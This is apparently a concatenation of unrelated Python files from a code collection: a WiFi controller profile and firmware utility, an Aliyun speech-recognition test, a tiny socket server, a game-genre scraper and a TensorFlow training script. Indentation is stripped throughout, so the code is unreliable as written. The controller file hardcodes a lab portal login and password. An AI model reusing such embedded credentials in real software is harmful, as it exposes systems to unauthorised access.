print("Please specify the new name for ssid profile that you want to make to")
return False
try:
profile = self.get_profile_by_name(profile_name=profile_name)
profile._details['ssid'] = new_profile_name
self.profile_client.update_profile(profile)
return True
except Exception as e:
return False
def update_ssid_profile(self, profile_info=None):
self.sdk_client.refresh_instance()
if profile_info is None:
print("profile info is None, Please specify the profile info that you want to update")
return False
try:
profile = self.get_profile_by_name(profile_name=profile_info["ssid_profile_name"])
profile._details["radiusServiceId"] = self.profile_creation_ids["radius"][0]
profile._child_profile_ids = self.profile_creation_ids["radius"] + self.profile_creation_ids["passpoint"]
if "radius_configuration" in profile_info.keys():
if "radius_acounting_service_interval" in profile_info["radius_configuration"].keys():
profile._details["radiusAcountingServiceInterval"] = profile_info["radius_configuration"]["radius_acounting_service_interval"]
if "user_defined_nas_id" in profile_info["radius_configuration"].keys():
profile._details["radiusClientConfiguration"]["userDefinedNasId"] = profile_info["radius_configuration"]["user_defined_nas_id"]
if "operator_id" in profile_info["radius_configuration"].keys():
profile._details["radiusClientConfiguration"]["operatorId"] = profile_info["radius_configuration"]["operator_id"]
self.profile_client.update_profile(profile)
return True
except Exception as e:
print(e)
return False
def clear_ssid_profile(self, profile_name=None):
if profile_name is None:
print("profile name is None, Please specify the ssid profile name that you want to update")
return False
try:
profile = self.get_profile_by_name(profile_name=profile_name)
profile._details["radiusServiceId"] = None
profile._child_profile_ids = []
self.profile_client.update_profile(profile)
return True
except Exception as e:
print(e)
return False
"""
method to delete a profile by its id
"""
def delete_profile(self, profile_id=None):
self.sdk_client.refresh_instance()
for i in profile_id:
self.profile_client.delete_profile(profile_id=i)
# Need to be depreciated by using push_profile method
def push_profile_old_method(self, equipment_id=None):
self.sdk_client.refresh_instance()
if equipment_id is None:
return 0
url = self.sdk_client.configuration.host + "/portal/equipment?equipmentId=" + str(equipment_id)
payload = {}
headers = self.sdk_client.configuration.api_key_prefix
response = requests.request("GET", url, headers=headers, data=payload)
equipment_info = response.json()
equipment_info['profileId'] = self.profile_creation_ids['ap']
url = self.sdk_client.configuration.host + "/portal/equipment"
headers = {
'Content-Type': 'application/json',
'Authorization': self.sdk_client.configuration.api_key_prefix['Authorization']
}
response = requests.request("PUT", url, headers=headers, data=json.dumps(equipment_info))
return response
"""
FirmwareUtility class
uses JfrogUtility base class
sdk_client [ controller_tests instance ]
controller_data [ sdk_base_url ] needed only if sdk_instance is not passed
customer_id [ 2 ] needed only if sdk_instance is not passed
"""
class FirmwareUtility:
def __init__(self,
sdk_client=None,
jfrog_credentials=None,
controller_data=None,
customer_id=2,
model=None,
version_url=None):
# super().__init__(credentials=jfrog_credentials)
if sdk_client is None:
sdk_client = Controller(controller_data=controller_data, customer_id=customer_id)
self.sdk_client = sdk_client
self.sdk_client.refresh_instance()
self.firmware_client = FirmwareManagementApi(api_client=sdk_client.api_client)
# self.jfrog_client = JFrogUtility(credentials=jfrog_credentials)
self.equipment_gateway_client = EquipmentGatewayApi(api_client=sdk_client.api_client)
self.model = model
self.fw_version = version_url
def get_fw_version(self):
fw_version = self.fw_version.split("/")[-1]
return fw_version
def upload_fw_on_cloud(self, force_upload=False):
self.sdk_client.refresh_instance()
fw_version = self.fw_version.split("/")[-1]
print("Upload fw version :", self.fw_version)
fw_id = self.is_fw_available(fw_version=fw_version)
if fw_id and not force_upload:
print("Skipping upload, Firmware Already Available", "Force Upload :", force_upload)
# Don't Upload the fw
return fw_id
else:
if fw_id and force_upload:
print("Firmware Version Already Available, Deleting and Uploading Again",
" Force Upload :", force_upload)
self.firmware_client.delete_firmware_version(firmware_version_id=fw_id)
print("Deleted Firmware Image from cloud, uploading again")
time.sleep(2)
# if force_upload is true and latest image available, then delete the image
firmware_data = {
"id": 0,
"equipmentType": "AP",
"modelId": str(self.model).upper(),
"versionName": fw_version,
"description": fw_version + " FW VERSION",
"filename": self.fw_version,
}
firmware_id = self.firmware_client.create_firmware_version(body=firmware_data)
print("Uploaded the Image: ", fw_version)
return firmware_id._id
def upgrade_fw(self, equipment_id=None, force_upgrade=False, force_upload=False):
self.sdk_client.refresh_instance()
if equipment_id is None:
print("No Equipment Id Given")
exit()
if (force_upgrade is True) or (self.should_upgrade_ap_fw(equipment_id=equipment_id)):
firmware_id = self.upload_fw_on_cloud(force_upload=force_upload)
time.sleep(5)
try:
obj = self.equipment_gateway_client.request_firmware_update(equipment_id=equipment_id,
firmware_version_id=firmware_id)
print("Request firmware upgrade Success! waiting for 300 sec")
time.sleep(400)
except Exception as e:
print(e)
obj = False
return obj
# Write the upgrade fw logic here
def should_upgrade_ap_fw(self, equipment_id=None):
self.sdk_client.refresh_instance()
current_fw = self.sdk_client.get_ap_firmware_old_method(equipment_id=equipment_id)
latest_fw = self.get_fw_version()
print(self.model, current_fw, latest_fw)
if current_fw == latest_fw:
return False
else:
return True
def is_fw_available(self, fw_version=None):
self.sdk_client.refresh_instance()
if fw_version is None:
exit()
try:
firmware_version = self.firmware_client.get_firmware_version_by_name(
firmware_version_name=fw_version)
firmware_version = firmware_version._id
print("Firmware ID: ", firmware_version)
except Exception as e:
print(e)
firmware_version = False
print("firmware not available: ", firmware_version)
return firmware_version
# This is for Unit tests on Controller Library
if __name__ == '__main__':
controller = {
'url': "https://wlan-portal-svc-nola-ext-04.cicd.lab.wlan.tip.build", # API base url for the controller
'username': 'support@example.com',
'password': 'support',
'version': "1.1.0-SNAPSHOT",
'commit_date': "2021-04-27"
}
api = Controller(controller_data=controller)
profile = ProfileUtility(sdk_client=api)
profile_data = {
"name": "test-rf-wifi-6",
"is2dot4GHz": {},
"is5GHz": {"channelBandwidth": "is20MHz"},
"is5GHzL": {"channelBandwidth": "is20MHz"},
"is5GHzU": {"channelBandwidth": "is20MHz"}
}
profile.set_rf_profile(profile_data=profile_data, mode="wifi6")
print(profile.default_profiles["rf"])
# profile.cleanup_profiles()
# profile.get_default_profiles()
# profile_data = {
# "profile_name": "ssid_wep_2g",
# "ssid_name": "ssid_wep_2g",
# "appliedRadios": ["is2dot4GHz"],
# "default_key_id" : 1,
# "wep_key" : 1234567890,
# "vlan": 1,
# "mode": "BRIDGE"
# }
# profile.create_wep_ssid_profile(profile_data=profile_data)
# print(profile.get_profile_by_name(profile_name="wpa_wpa2_eap"))
# profile.get_default_profiles()
api.disconnect_Controller()
|
test_sr.py
|
import time
import threading
import sys
import nls
URL="wss://nls-gateway.cn-shanghai.aliyuncs.com/ws/v1"
AKID="Your AKID"
AKKEY="Your AKSECRET"
APPKEY="Your APPKEY"
class TestSr:
def __init__(self, tid, test_file):
self.__th = threading.Thread(target=self.__test_run)
self.__id = tid
self.__test_file = test_file
def loadfile(self, filename):
with open(filename, "rb") as f:
self.__data = f.read()
def start(self):
self.loadfile(self.__test_file)
self.__th.start()
def test_on_start(self, message, *args):
print("test_on_start:{}".format(message))
def test_on_error(self, message, *args):
print("on_error args=>{}".format(args))
def test_on_close(self, *args):
print("on_close: args=>{}".format(args))
def test_on_result_chg(self, message, *args):
print("test_on_chg:{}".format(message))
def test_on_completed(self, message, *args):
print("on_completed:args=>{} message=>{}".format(args, message))
def __test_run(self):
print("thread:{} start..".format(self.__id))
sr = nls.NlsSpeechRecognizer(
url=URL,
akid=AKID,
aksecret=AKKEY,
appkey=APPKEY,
on_start=self.test_on_start,
on_result_changed=self.test_on_result_chg,
on_completed=self.test_on_completed,
on_error=self.test_on_error,
on_close=self.test_on_close,
callback_args=[self.__id]
)
while True:
print("{}: session start".format(self.__id))
r = sr.start(aformat="pcm", ex={"hello":123})
self.__slices = zip(*(iter(self.__data),) * 640)
for i in self.__slices:
sr.send_audio(bytes(i))
time.sleep(0.01)
r = sr.stop()
print("{}: sr stopped:{}".format(self.__id, r))
time.sleep(5)
def multiruntest(num=500):
for i in range(0, num):
name = "thread" + str(i)
t = TestSr(name, "tests/test1.pcm")
t.start()
nls.enableTrace(True)
multiruntest(1)
|
py_threaded.py
|
import socket
from threading import Thread
def handle_request(client):
client.sendall(b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nContent-Length: 11\r\n\r\nhello world\r\n")
client.close()
def run_server():
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as server:
server.bind(('localhost', 8002))
server.listen()
print("start listening...")
while True:
try:
client, _ = server.accept()
Thread(target=handle_request, args=(client,)).start()
except KeyboardInterrupt:
break
if __name__ == "__main__":
run_server()
|
main.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
from timeit import default_timer
from threading import Thread
import time
import sys
sys.path.append('genre_translate_file')
import create as create_genre_translate
from db import db_create_backup, Dump, db
from common_utils import get_parsers, get_games_list, wait, get_logger, AtomicCounter, seconds_to_str, print_parsers
IGNORE_SITE_NAMES = ['gamefaqs_gamespot_com']
# Test
USE_FAKE_PARSER = False
if USE_FAKE_PARSER:
class FakeParser:
@classmethod
def get_site_name(cls): return "<test>"
@staticmethod
def get_game_genres(game_name):
if game_name == 'Foo':
raise Exception('Error')
return ['RGB-bar', 'Action-bar']
# Monkey Patch
def get_parsers():
return [FakeParser]
def get_games_list(): return ['Foo', 'Bar', 'Zet']
log = get_logger()
counter = AtomicCounter()
def run_parser(parser, games: list, max_num_request=5):
try:
pauses = [
('15 minutes', 15 * 60),
('30 minutes', 30 * 60),
('45 minutes', 45 * 60),
('1 hour', 60 * 60),
]
SITE_NAME = parser.get_site_name()
timeout = 3 # 3 seconds
MAX_TIMEOUT = 10 # 10 seconds
TIMEOUT_EVERY_N_GAMES = 50 # Every 50 games
TIMEOUT_BETWEEN_N_GAMES = 3 * 60 # 3 minutes
number = 0
for game_name in games:
try:
if Dump.exists(SITE_NAME, game_name):
continue
number += 1
num_request = 0
while True:
num_request += 1
try:
if num_request == 1:
log.info(f'#{number}. Search genres for {game_name!r} ({SITE_NAME})')
else:
log.info(f'#{number}. Search genres for {game_name!r} ({SITE_NAME}). '
f'Attempts {num_request}/{max_num_request}')
genres = parser.get_game_genres(game_name)
log.info(f'#{number}. Found genres {game_name!r} ({SITE_NAME}): {genres}')
Dump.add(SITE_NAME, game_name, genres)
counter.inc()
time.sleep(timeout)
break
except:
log.exception(f'#{number}. Error on request {num_request}/{max_num_request} ({SITE_NAME})')
if num_request >= max_num_request:
log.info(f'#{number}. Attempts ended for {game_name!r} ({SITE_NAME})')
break
pause_text, pause_secs = pauses[num_request - 1]
log.info(f'#{number}. Pause: {pause_text} secs')
time.sleep(pause_secs)
timeout += 1
if timeout > MAX_TIMEOUT:
timeout = MAX_TIMEOUT
if number % TIMEOUT_EVERY_N_GAMES == 0:
log.info(
f'#{number}. Pause for every {TIMEOUT_EVERY_N_GAMES} games: {TIMEOUT_BETWEEN_N_GAMES} secs'
)
time.sleep(TIMEOUT_BETWEEN_N_GAMES)
except:
log.exception(f'#{number}. Error by game {game_name!r} ({SITE_NAME})')
except:
log.exception(f'Error:')
if __name__ == "__main__":
parsers = [x for x in get_parsers() if x.get_site_name() not in IGNORE_SITE_NAMES]
print_parsers(parsers, log=lambda *args, **kwargs: log.info(*args, **kwargs))
while True:
try:
log.info(f'Started')
t = default_timer()
db_create_backup()
games = get_games_list()
log.info(f'Total games: {len(games)}')
threads = []
for parser in parsers:
threads.append(
Thread(target=run_parser, args=[parser, games])
)
log.info(f'Total parsers/threads: {len(threads)}')
log.info(f'Ignore parsers ({len(IGNORE_SITE_NAMES)}): {", ".join(IGNORE_SITE_NAMES)}')
counter.value = 0
for thread in threads:
thread.start()
for thread in threads:
thread.join()
log.info(f'Finished. Added games: {counter.value}. Total games: {Dump.select().count()}. '
f'Elapsed time: {seconds_to_str(default_timer() - t)}')
create_genre_translate.run()
wait(days=1)
except:
log.exception('')
wait(minutes=15)
finally:
log.info('')
|
train.py
|
# --------------------------------------------------------
# FCN
# Copyright (c) 2016 RSE at UW
# Licensed under The MIT License [see LICENSE for details]
# Written by Yu Xiang
# Heavily modified by David Michelman
# --------------------------------------------------------
"""Train a nerual network"""
from fcn.config import cfg
from gt_flow_data_layer.layer import GtFlowDataLayer
from gt_lov_correspondence_layer.layer import GtLOVFlowDataLayer
from gt_lov_synthetic_layer.layer import GtLOVSyntheticLayer
from utils.timer import Timer
import time
import os
import tensorflow as tf
import threading
from utils.yellowfin import YFOptimizer
pause_data_input = False
loader_paused = False
class SolverWrapper(object):
"""A simple wrapper around Tensorflow's solver. It manages saving checkpoints and deleting old checkpoints.
"""
def __init__(self, sess, network, imdb, roidb, output_dir, pretrained_model=None):
"""Initialize the SolverWrapper."""
self.net = network
self.imdb = imdb
self.roidb = roidb
self.output_dir = output_dir
self.pretrained_model = pretrained_model
# For checkpoint
self.saver = tf.train.Saver()
def snapshot(self, sess, iter):
"""Save the network's weights."""
if not os.path.exists(self.output_dir):
os.makedirs(self.output_dir)
infix = ('_' + cfg.TRAIN.SNAPSHOT_INFIX
if cfg.TRAIN.SNAPSHOT_INFIX != '' else '')
filename = (cfg.TRAIN.SNAPSHOT_PREFIX + infix +
'_iter_{:d}'.format(iter+1) + '.ckpt')
filename = os.path.join(self.output_dir, filename)
self.saver.save(sess, filename)
print 'Wrote snapshot to: {:s}'.format(filename)
def train_model(self, sess, train_op, loss, learning_rate, max_iters, net=None):
"""Network training loop."""
# add summary
tf.summary.scalar('loss', loss)
merged = tf.summary.merge_all()
train_writer = tf.summary.FileWriter(self.output_dir, sess.graph)
# initialize variables
print "initializing variables"
sess.run(tf.global_variables_initializer())
if self.pretrained_model is not None and str(self.pretrained_model).find('.npy') != -1:
print ('Loading pretrained model '
'weights from {:s}').format(self.pretrained_model)
self.net.load(self.pretrained_model, sess, True)
elif self.pretrained_model is not None and str(self.pretrained_model).find('.ckpt') != -1:
print ('Loading checkpoint from {:s}').format(self.pretrained_model)
self.saver.restore(sess, self.pretrained_model)
tf.get_default_graph().finalize()
last_snapshot_iter = -1
start_iter = 0
if self.pretrained_model is not None and str(self.pretrained_model).find('.ckpt') != -1:
start_index = str(self.pretrained_model).find('iter_') + 5
end_index = str(self.pretrained_model).find('.ckpt')
start_iter = int(self.pretrained_model[start_index : end_index])
loss_history = list()
timer = Timer()
for iter in range(start_iter, max_iters):
timer.tic()
queue_size = sess.run(net.queue_size_op)
while sess.run(net.queue_size_op) == 0:
time.sleep(0.005)
summary, loss_value, lr, _ = sess.run([merged, loss, learning_rate, train_op, ])
train_writer.add_summary(summary, iter)
timer.toc()
print 'iter: %d / %d, loss: %7.4f, lr: %0.2e, time: %1.2f, queue size before training op: %3i' %\
(iter+1, max_iters, loss_value, lr, timer.diff, queue_size)
loss_history.append(loss_value)
if (iter+1) % cfg.TRAIN.SNAPSHOT_ITERS == 0:
last_snapshot_iter = iter
self.snapshot(sess, iter)
if cfg.TRAIN.DELETE_OLD_CHECKPOINTS:
base_dir = os.getcwd()
try:
os.chdir(self.output_dir)
while True:
files = sorted(os.listdir("."), key=os.path.getctime)
if len(files) < 20:
break
while files[0].find(".") == -1:
files.pop(0)
os.remove(files[0])
except IndexError:
pass
finally:
os.chdir(base_dir)
if last_snapshot_iter != iter:
self.snapshot(sess, iter)
def get_training_roidb(imdb):
"""Returns a roidb (Region of Interest database) for use in training."""
if cfg.TRAIN.USE_FLIPPED:
print 'Appending horizontally-flipped training examples...'
imdb.append_flipped_images()
print 'done'
return imdb.roidb
def load_and_enqueue(sess, net, roidb, num_classes, coord):
global loader_paused
assert cfg.TRAIN.OPTICAL_FLOW, "this network can only do optical flow"
# data layer
if cfg.IMDB_NAME.count("lov_synthetic") != 0:
data_layer = GtLOVSyntheticLayer(roidb, num_classes)
elif cfg.INPUT == "LEFT_RIGHT_CORRESPONDENCE":
data_layer = GtLOVFlowDataLayer(roidb, num_classes)
else:
data_layer = GtFlowDataLayer(roidb, num_classes)
while not coord.should_stop():
while pause_data_input:
loader_paused = True
time.sleep(0.001)
loader_paused = False
while sess.run(net.queue_size_op) > net.queue_size - 1:
time.sleep(0.01)
blobs = data_layer.forward()
left_blob = blobs['left_image']
right_blob = blobs['right_image']
flow_blob = blobs['flow']
occluded_blob = blobs['occluded']
left_labels = blobs['left_labels']
right_labels = blobs['right_labels']
feed_dict = {net.data_left: left_blob, net.data_right: right_blob, net.gt_flow: flow_blob,
net.occluded: occluded_blob, net.labels_left: left_labels, net.labels_right: right_labels, net.keep_prob: 1.0}
try:
sess.run(net.enqueue_op, feed_dict=feed_dict)
except tf.errors.CancelledError as e:
print "queue closed, loader thread exiting"
break
if sess.run(net.queue_size_op) >18:
time.sleep(0.0) # yield to training thread
def train_flow(network, imdb, roidb, output_dir, pretrained_model=None, max_iters=40000, n_cpu_threads=1):
"""Train a Fast R-CNN network."""
loss = network.get_output('final_triplet_loss')[0]
# optimizer
global_step = tf.Variable(0, trainable=False)
if cfg.TRAIN.OPTIMIZER.lower() == 'momentumoptimizer' or cfg.TRAIN.OPTIMIZER.lower() == 'momentum':
starter_learning_rate = cfg.TRAIN.LEARNING_RATE
learning_rate = tf.train.exponential_decay(starter_learning_rate, global_step,
cfg.TRAIN.STEPSIZE, 0.1, staircase=True)
momentum = cfg.TRAIN.MOMENTUM
train_op = tf.train.MomentumOptimizer(learning_rate, momentum).minimize(loss, global_step=global_step)
elif cfg.TRAIN.OPTIMIZER.lower() == 'adam':
train_op = tf.train.AdamOptimizer(learning_rate=cfg.TRAIN.LEARNING_RATE_ADAM).minimize(loss, global_step=global_step)
learning_rate = tf.constant(cfg.TRAIN.LEARNING_RATE_ADAM)
elif cfg.TRAIN.OPTIMIZER.lower() == 'yellowfin':
# This didn't work at all
optimizer = YFOptimizer(zero_debias=False, learning_rate=cfg.TRAIN.LEARNING_RATE, momentum=0.0)
train_op = optimizer.minimize(loss, global_step=global_step)
learning_rate = optimizer.get_lr_tensor()
else:
assert False, "An optimizer must be specified"
with tf.Session(config=tf.ConfigProto(allow_soft_placement=True, intra_op_parallelism_threads=n_cpu_threads)) as sess:
sw = SolverWrapper(sess, network, imdb, roidb, output_dir, pretrained_model=pretrained_model)
# thread to load data
coord = tf.train.Coordinator()
if cfg.TRAIN.VISUALIZE:
load_and_enqueue(sess, network, roidb, imdb.num_classes, coord)
else:
t = threading.Thread(target=load_and_enqueue, args=(sess, network, roidb, imdb.num_classes, coord))
t.start()
print 'Solving...'
sw.train_model(sess, train_op, loss, learning_rate, max_iters, net = network)
print 'done solving'
sess.run(network.close_queue_op)
coord.request_stop()
coord.join([t])
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.